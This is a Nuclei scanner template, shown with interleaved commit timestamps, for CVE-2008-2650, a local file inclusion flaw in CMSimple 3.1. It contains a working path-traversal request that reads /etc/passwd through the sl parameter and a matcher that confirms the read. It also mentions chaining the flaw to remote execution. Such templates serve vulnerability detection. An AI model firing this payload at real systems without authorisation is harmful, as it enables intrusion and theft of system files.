2022-06-03 19:12:31 +00:00
id : CVE-2008-2650
2022-04-22 10:38:41 +00:00
2022-05-17 09:18:12 +00:00
info :
name : CMSimple 3.1 - Local File Inclusion
author : pussycat0x
2023-07-11 19:49:27 +00:00
severity : medium
2022-05-17 09:18:12 +00:00
description : |
2022-07-08 19:07:55 +00:00
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE : on 20080601 , the vendor patched 3.1 without changing the version number.
2022-05-17 09:18:12 +00:00
reference :
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
2022-07-05 18:07:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
2023-07-11 19:49:27 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42792
2022-05-17 09:18:12 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score : 6.8
2022-05-17 09:18:12 +00:00
cve-id : CVE-2008-2650
2022-07-08 19:07:55 +00:00
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.06344
cpe : cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cmsimple
product : cmsimple
tags : cve,cve2008,lfi,cmsimple
2022-04-22 10:38:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-06-03 19:12:31 +00:00
- raw :
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : regex
2022-07-06 09:09:56 +00:00
part : body
2022-06-03 19:12:31 +00:00
regex :
- "root:.*:0:0:"
2022-07-06 09:09:56 +00:00
- type : status
status :
- 200